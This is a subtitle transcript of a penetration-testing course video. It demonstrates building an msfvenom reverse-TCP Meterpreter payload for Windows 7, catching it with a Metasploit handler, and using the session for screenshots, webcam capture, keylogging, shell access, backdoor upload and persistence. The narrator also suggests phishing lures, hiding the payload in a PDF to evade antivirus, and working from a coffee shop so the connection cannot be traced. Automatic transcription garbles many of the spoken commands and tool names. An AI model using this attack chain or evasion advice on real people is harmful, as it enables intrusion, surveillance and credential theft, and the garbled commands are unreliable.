1
00:00:00,660 --> 00:00:07,690
Welcome to Part Five of this module so we're now ready to hack a Windows P.C. for the very first time

2
00:00:08,290 --> 00:00:09,680
for this demonstration.

3
00:00:09,700 --> 00:00:17,050
I'm going to be using a 32 bit installation of Windows 7 Professional Service Pack 1 and running on

4
00:00:17,050 --> 00:00:18,720
a virtual machine.

5
00:00:18,760 --> 00:00:22,510
There are a couple of things to note about this going in.

6
00:00:22,510 --> 00:00:27,310
This is our first attempt to penetrate a Windows system using metal split.

7
00:00:27,340 --> 00:00:34,450
So I'm purposefully keeping things very simple for this first test so that students can follow along

8
00:00:34,450 --> 00:00:36,750
without any undue difficulty.

9
00:00:36,770 --> 00:00:43,420
They're obviously a great many different ways to do this and those of you who already have experience

10
00:00:43,420 --> 00:00:48,570
with Metis ploy it might turn your nose up at the simplicity of this first round.

11
00:00:48,580 --> 00:00:54,430
The second thing to be aware of is that this method is going to require a few extra steps involving

12
00:00:54,430 --> 00:00:55,900
port forwarding.

13
00:00:56,110 --> 00:01:01,100
If you plan to attempt it against a target that is not on your local network.

14
00:01:01,390 --> 00:01:07,990
These will be covered in a subsequent video very soon because we're keeping this first foray as straightforward

15
00:01:07,990 --> 00:01:09,050
as possible.

16
00:01:09,130 --> 00:01:13,680
The target machine has no antivirus or other special defenses running.

17
00:01:13,840 --> 00:01:18,160
We will be looking at how to deal with those in a future video.

18
00:01:18,160 --> 00:01:20,590
So here is the scenario.

19
00:01:20,590 --> 00:01:27,220
We are a penetration tester contracted by a large company to test network security.

20
00:01:27,220 --> 00:01:32,920
We have either been given access or hacked into the wireless network.

21
00:01:32,920 --> 00:01:40,180
We are now on the network and we've done our network reconnaissance and we know which machines are which

22
00:01:40,720 --> 00:01:41,640
more than that.

23
00:01:41,650 --> 00:01:49,930
We did our research into this company using tools like multi ago and recon energy so we know a bit about

24
00:01:49,960 --> 00:01:57,060
who is who in the company we know who is who the important people are and we know their email addresses.

25
00:01:57,100 --> 00:02:04,210
So with all of that in mind what we want to do is use Metis Floyd to gain initial access to an important

26
00:02:04,210 --> 00:02:06,370
computer on the network.

27
00:02:06,520 --> 00:02:10,300
Again things are being kept very simple for this first demonstration.

28
00:02:10,300 --> 00:02:17,950
So pretend that the network administrator is a chimpanzee and there is absolutely no special security

29
00:02:17,950 --> 00:02:18,930
at all.

30
00:02:19,150 --> 00:02:26,640
And sometimes that's not actually too far from the truth so our first step as always is going to be

31
00:02:26,640 --> 00:02:28,820
to start up the MSF console.

32
00:02:28,980 --> 00:02:37,470
So if you need a refresher on how to do that you would just type service post Gris Q L start and then

33
00:02:37,470 --> 00:02:48,800
you would follow that up with MSF console to save time I've already done that of course now as counter-intuitive

34
00:02:48,860 --> 00:02:50,900
as this might seem.

35
00:02:50,960 --> 00:02:56,530
What we need is our own IP address rather than the target machine.

36
00:02:56,540 --> 00:03:02,450
Remember that regular commands for the most part route right through the MSF console.

37
00:03:02,510 --> 00:03:12,430
So all we have to do is type ii f config and copy the address that we see.

38
00:03:12,450 --> 00:03:16,140
This will be our network address.

39
00:03:16,220 --> 00:03:16,930
Great.

40
00:03:16,940 --> 00:03:18,140
We have our network IP.

41
00:03:18,620 --> 00:03:23,260
Now of course like I said there are many ways we could proceed with what we want to do.

42
00:03:23,270 --> 00:03:29,090
You've already seen how to scan a target for potential vulnerabilities and use the search function to

43
00:03:29,090 --> 00:03:31,300
try to find an exploit for it.

44
00:03:31,460 --> 00:03:39,710
This time we're going to create a payload using MSF venom that we're going to send to our target machine.

45
00:03:39,710 --> 00:03:43,280
So we start by typing MSF venom

46
00:03:46,100 --> 00:03:52,910
I want to quickly point out that in the old days the command was MSF payload even though that command

47
00:03:52,910 --> 00:03:59,370
is now obsolete you'll still run into it being used on some specialized distributions of a split.

48
00:03:59,480 --> 00:04:02,170
However in Cali it's MSF venom.

49
00:04:02,390 --> 00:04:13,490
So we're going to create a payload so to do this we're going to type MSF venom TAC lowercase P and it's

50
00:04:13,490 --> 00:04:16,940
going to be a maternal critter payload for Windows.

51
00:04:16,940 --> 00:04:27,960
So we're gonna say Windows forward slash interpreter forward slash reverse T C P.

52
00:04:28,140 --> 00:04:33,750
If you've been following these videos in order and I hope you have you should be familiar with how the

53
00:04:33,750 --> 00:04:42,740
reverse T C P looks so then we're gonna give it R L host and this is going to be the IP address of our

54
00:04:42,950 --> 00:04:44,570
Cally machine.

55
00:04:44,600 --> 00:04:51,260
I want to be clear this is not the IP address of the target like you would probably think this is our

56
00:04:51,260 --> 00:04:55,600
own network address that we just got with the F config command.

57
00:04:55,640 --> 00:05:01,670
So in this case that's going to be 10 dot 0 0 dot 21 and yours will vary.

58
00:05:01,670 --> 00:05:09,520
And now we need to set the L port so we're going to give that l port equals four thousand four hundred

59
00:05:09,520 --> 00:05:12,470
and forty four.

60
00:05:12,610 --> 00:05:21,070
We're gonna do tack lowercase F for the format which is going to be e XY you could play around with

61
00:05:21,070 --> 00:05:22,540
different formats.

62
00:05:22,660 --> 00:05:25,660
As I said I'm keeping things simple for this first demonstration

63
00:05:30,690 --> 00:05:37,470
and then we will do forward slash and we could create the payload anywhere.

64
00:05:37,470 --> 00:05:42,130
I'm going to create the payload on the desktop just for simplicity's sake.

65
00:05:42,300 --> 00:05:45,450
So route desktop forward slash.

66
00:05:45,480 --> 00:05:47,650
And now we'll give the payload a name.

67
00:05:47,670 --> 00:05:56,940
Now you would probably want to name this something innocuous like I don't know run DSL or or something

68
00:05:56,940 --> 00:06:00,470
that would be unlikely to be noticed.

69
00:06:00,570 --> 00:06:09,170
Were it to be seen in a task window for for the sake of clarity.

70
00:06:09,170 --> 00:06:18,200
I'm just going to name it payload XY once this is done we press enter and two other things I should

71
00:06:18,200 --> 00:06:26,570
note here first because I did not use attack lowercase a to specify an architecture it's going to put

72
00:06:26,570 --> 00:06:35,990
out an X 86 or 32 bit payload by default you may need to throw in that extra switch to specify 64 bit

73
00:06:37,130 --> 00:06:42,020
or X 64 depending on the target machine that you're going after.

74
00:06:42,020 --> 00:06:47,750
Also please be aware that in this first demonstration no encoder is being used.

75
00:06:47,810 --> 00:06:55,090
I'll talk about what that means in a second and generating the payload should probably take a few minutes.

76
00:06:55,100 --> 00:06:56,490
Actually here it goes.

77
00:07:00,650 --> 00:07:06,560
Now if we flip over to the desktop for a second we can see that the payload was generated their payload

78
00:07:06,560 --> 00:07:08,390
dot e XY.

79
00:07:08,390 --> 00:07:13,400
This is because as I said I specified the path route desktop.

80
00:07:13,580 --> 00:07:18,680
And again you could create it anywhere you want and you can name it anywhere you want.

81
00:07:18,680 --> 00:07:23,950
The payload is going to give us remote access to the computer that we wish to hack into.

82
00:07:24,020 --> 00:07:27,680
I said a moment ago that no encoder was used.

83
00:07:27,700 --> 00:07:31,670
We also gave it a stupidly obvious name by calling it payload.

84
00:07:32,080 --> 00:07:39,520
So no chimpanzee in their right mind would click on this and if they did it should trigger any antivirus

85
00:07:39,520 --> 00:07:44,190
software worthy of the name just to show you what I mean.

86
00:07:44,470 --> 00:07:53,910
If we quickly pull up a virus total or any other scanning service that we prefer and upload the file

87
00:07:56,790 --> 00:08:04,320
we can see that it is almost universally detected as a virus or a Trojan by literally every antivirus

88
00:08:04,320 --> 00:08:05,920
software out there.

89
00:08:06,670 --> 00:08:10,920
Needless to say this isn't going to cut it in a real world scenario.

90
00:08:10,930 --> 00:08:17,680
This is why in practice we need to take additional steps such as using an encoder or a crypto to mask

91
00:08:17,710 --> 00:08:22,060
the true nature of the file so that it slips past antivirus.

92
00:08:22,060 --> 00:08:28,270
We would probably also want to use a third party program to attach our malicious payload to a more innocent

93
00:08:28,270 --> 00:08:31,140
looking file such as a PD f.

94
00:08:31,330 --> 00:08:37,990
This would allow us to create a Trojan horse causing the payload to be activated any time the file that

95
00:08:37,990 --> 00:08:40,630
it is attached to is opened.

96
00:08:40,630 --> 00:08:42,490
More on this later.

97
00:08:42,940 --> 00:08:49,510
But remember in this first demo the system administrator is a chimpanzee who is too busy eating bananas

98
00:08:49,510 --> 00:08:53,460
to worry about installing antivirus or countermeasures.

99
00:08:53,710 --> 00:08:59,680
And because we know who is who in the company thanks to our work with recon energy and Montego and other

100
00:08:59,680 --> 00:09:06,940
tools like them we know that a particularly good employee to send our payload to is Bob.

101
00:09:06,940 --> 00:09:11,650
Bob works in accounts and his security practices are terrible.

102
00:09:11,650 --> 00:09:18,980
He trusts the chimp to keep him safe and doesn't think twice about opening any emails he gets sent and

103
00:09:19,070 --> 00:09:27,520
we have his email through the programs that have been mentioned so we could send him the payload by

104
00:09:27,550 --> 00:09:30,850
email until bomb that he has won a million dollars.

105
00:09:30,910 --> 00:09:34,360
All he has to do is download the payload and run it.

106
00:09:34,360 --> 00:09:40,210
Or maybe we could encode the payloads that it won't be detected then attach it to a PDA that contains

107
00:09:40,210 --> 00:09:44,170
instructions on how Bob can claim his prize.

108
00:09:44,170 --> 00:09:49,410
Either way Bob downloads it runs it and we're in.

109
00:09:49,420 --> 00:09:54,850
Bob isn't too bright and before you say this couldn't possibly happen.

110
00:09:54,850 --> 00:09:57,920
No one in the real world would be this stupid.

111
00:09:58,240 --> 00:10:06,220
I would point out that highly placed members of a certain political campaign in the American 2016 election

112
00:10:06,220 --> 00:10:11,290
fell for exactly this trick with disastrous results.

113
00:10:11,290 --> 00:10:16,640
Yes you need to be clever but people really are this gullible.

114
00:10:16,780 --> 00:10:24,040
At any rate what we're actually going to do just again for this demonstration is to pretend that we

115
00:10:24,040 --> 00:10:24,940
are Bob.

116
00:10:24,940 --> 00:10:29,930
We manually transfer our payload over to the Windows system and then run it.

117
00:10:29,980 --> 00:10:33,610
Remember it doesn't matter how the payload gets to the target.

118
00:10:33,610 --> 00:10:35,780
There are countless methods.

119
00:10:36,190 --> 00:10:43,400
But before Bob opens the payload we're going to need to be ready by loading up the correct exploit.

120
00:10:43,870 --> 00:10:52,780
So to begin with we're going to type use exploit forward slash multi forward slash handler

121
00:10:55,580 --> 00:10:56,300
as always.

122
00:10:56,300 --> 00:11:02,150
The exploit appears and read as part of the prompt indicating that it is now loaded.

123
00:11:02,150 --> 00:11:05,380
Now we need to set the El host within the exploit.

124
00:11:05,420 --> 00:11:11,840
This is exactly what you saw in the previous videos except that we're going to supply the El host of

125
00:11:11,840 --> 00:11:16,070
our own network IP for the Kelly machine that we're currently using.

126
00:11:16,100 --> 00:11:17,700
Again yours will vary.

127
00:11:17,990 --> 00:11:30,300
Set El host 10 0 0 at 21 which in this case is the one I'm using and now we need to set the port set

128
00:11:30,660 --> 00:11:37,180
El port for 4 4 4 and we'll show options

129
00:11:40,220 --> 00:11:41,410
OK.

130
00:11:41,640 --> 00:11:43,370
Everything looks ready.

131
00:11:43,500 --> 00:11:44,870
We are locked and loaded.

132
00:11:44,880 --> 00:11:51,270
So we just type exploit.

133
00:11:51,310 --> 00:11:53,390
Now we play the waiting game.

134
00:11:53,440 --> 00:12:00,160
We've started a reverse t S.P. handler on our own machine using port for four four four.

135
00:12:00,160 --> 00:12:06,370
Now we can sit here until the cows come home but nothing is going to happen until Bob or someone else

136
00:12:06,670 --> 00:12:09,340
double clicks on the payload that we created.

137
00:12:09,370 --> 00:12:16,600
Once that happens the payload will establish a connection with us and we'll have a mature operator session

138
00:12:17,050 --> 00:12:19,300
to simulate Bob opening up the payload.

139
00:12:19,300 --> 00:12:24,020
We need to go on to our target machine and double click payload EMC.

140
00:12:24,210 --> 00:12:30,670
Remember to only do this on a virtual machine if you are following along so I'm going to go ahead and

141
00:12:30,670 --> 00:12:37,180
do that now Bob has just opened up the payload

142
00:12:43,260 --> 00:12:51,030
and there we go with big shining eyes Bob just opened up payload EMC hoping to claim his cash prize.

143
00:12:51,150 --> 00:12:57,780
Sadly for Bob we now have a maternity session directly into his computer for as long as the system stays

144
00:12:57,840 --> 00:12:58,400
up.

145
00:12:58,410 --> 00:13:02,510
We pretty much own it from here.

146
00:13:02,520 --> 00:13:04,070
The sky's the limit.

147
00:13:04,140 --> 00:13:11,860
So let's start playing around a bit can do System Info to see what kind of computer it is.

148
00:13:12,000 --> 00:13:19,370
Although we probably already knew that we might for instance have obtained a list of email addresses

149
00:13:19,370 --> 00:13:28,010
for every employee in the company using recon and gee maybe we sent the same payload to 100 people and

150
00:13:28,010 --> 00:13:30,760
we just waited to get lucky.

151
00:13:30,780 --> 00:13:32,370
So what what next.

152
00:13:33,000 --> 00:13:40,670
Well let's let's go ahead and take a screenshot of the target computer and see what Bob sees

153
00:13:45,860 --> 00:13:48,590
this saves a screenshot to our root directory.

154
00:13:49,490 --> 00:13:56,660
So I'll just pull that up.

155
00:13:56,830 --> 00:14:02,470
It's a little small and blurry because our target is actually a virtual machine in windowed mode but

156
00:14:02,470 --> 00:14:07,640
you get the idea we can even take a picture of Bob through his own web cam

157
00:14:12,950 --> 00:14:16,970
which won't actually work in this demonstration because the target is a virtual box.

158
00:14:16,970 --> 00:14:23,510
But again you get the idea that picture just like the screenshot we just saw will be saved in your root

159
00:14:23,510 --> 00:14:31,920
directory we can start key logging everything that Bob types by typing key scan underscore.

160
00:14:31,930 --> 00:14:32,530
Start

161
00:14:35,960 --> 00:14:40,500
and now let me just pull up a notepad and type something as Bob.

162
00:14:40,800 --> 00:14:45,030
So of course normally we just leave this running for the duration of the session but let's see what

163
00:14:45,030 --> 00:14:47,150
Bob just typed

164
00:14:49,760 --> 00:14:53,210
by typing key scan underscore.

165
00:14:53,270 --> 00:14:53,840
Dump

166
00:14:58,210 --> 00:14:59,790
we can see that he has typed.

167
00:14:59,800 --> 00:15:02,170
Hello my name is Bob.

168
00:15:02,170 --> 00:15:08,290
Shifts are shown my super secret password is w q One two three.

169
00:15:08,290 --> 00:15:11,710
Please don't use w q 1 2 3 as your super secret password

170
00:15:14,320 --> 00:15:21,970
we can also execute a shell command and gain direct access as though we were sitting at the computer

171
00:15:21,970 --> 00:15:32,230
in front of the command prompt by typing shell from here we could run files delete files edit files

172
00:15:32,890 --> 00:15:40,300
and if we wanted to keep long term access we could back up into mature prettier again by typing the

173
00:15:40,300 --> 00:15:45,970
exit command once then we could use the upload command

174
00:15:48,680 --> 00:15:57,980
to send a bot or remote access server then we could go back into shell and run it thus ensuring that

175
00:15:58,310 --> 00:16:06,110
RF even after the mature operator session ends we will always be able to obtain access again we could

176
00:16:06,170 --> 00:16:12,860
turn the computer into a bot or use the remote access tool kit to hack into it later without having

177
00:16:12,860 --> 00:16:19,520
to resort to Metis Floyd at all we could also set things up so that the payload gets automatically run

178
00:16:19,520 --> 00:16:27,920
invisibly as a cron job lets say every 10 minutes or whatever thus allowing us to access the machine

179
00:16:27,920 --> 00:16:34,460
again using the same method that we are now without requiring anyone to actually open the payload manually

180
00:16:35,230 --> 00:16:42,350
and all of that is just scratching the surface we can download files using the download command execute

181
00:16:42,350 --> 00:16:48,560
commands on the network that originate from that computer pretty much anything you can think of as if

182
00:16:48,560 --> 00:16:55,430
you were sitting in front of the computer yourself we can also end the session by typing exit within

183
00:16:55,430 --> 00:17:02,510
return fritter or the session will automatically terminate when the system is shut down or rebooted

184
00:17:03,020 --> 00:17:11,370
which I will now demonstrate the point is that we need to be a bit quick once we have access if we want

185
00:17:11,370 --> 00:17:18,420
to ensure we keep access over the long term so make sure you have a plan for what you want to accomplish

186
00:17:18,630 --> 00:17:27,790
once you're in control C followed by the exit command will end the session and bring back to the MSF

187
00:17:27,790 --> 00:17:36,700
console now as was said at the start of this video port forwarding is something we need to set up on

188
00:17:36,700 --> 00:17:43,030
the router if we plan to do this from a remote location rather than on the same network as the target

189
00:17:43,030 --> 00:17:44,290
machine.

190
00:17:44,290 --> 00:17:51,130
Be aware that if you do this you'll need to use your own IP address when configuring the payload and

191
00:17:51,130 --> 00:17:57,760
a smart system ad men who isn't some species of monkey can easily trace the connection right back to

192
00:17:57,760 --> 00:18:03,430
its point of origin this is where virtual private servers and other anonymous sizing techniques come

193
00:18:03,430 --> 00:18:10,840
into play but those are a subject for another video if all else fails your average hacker operating

194
00:18:11,500 --> 00:18:18,800
on a shoestring budget can always just use a coffee shop or something like it and therefore not have

195
00:18:18,800 --> 00:18:26,870
to worry about the IP being traced and remember to have a good stern talk with Bob about his security

196
00:18:26,870 --> 00:18:34,250
practices after you finish your duly authorised penetration test and security audit and as always.

197
00:18:34,320 --> 00:18:40,560
Never use anything shown in this video or any other video in the series against anyone or anything you

198
00:18:40,560 --> 00:18:45,960
don't have written permission from the owner to penetration test be aware of the law and obey it at

199
00:18:45,960 --> 00:18:53,100
all times and be ethical in the next video we'll look at doing this same kind of thing but in more advanced

200
00:18:53,100 --> 00:18:57,390
ways that no longer assume our opponent is a chimpanzee.

201
00:18:57,390 --> 00:19:00,200
I hope you found this helpful and I'll see you next time.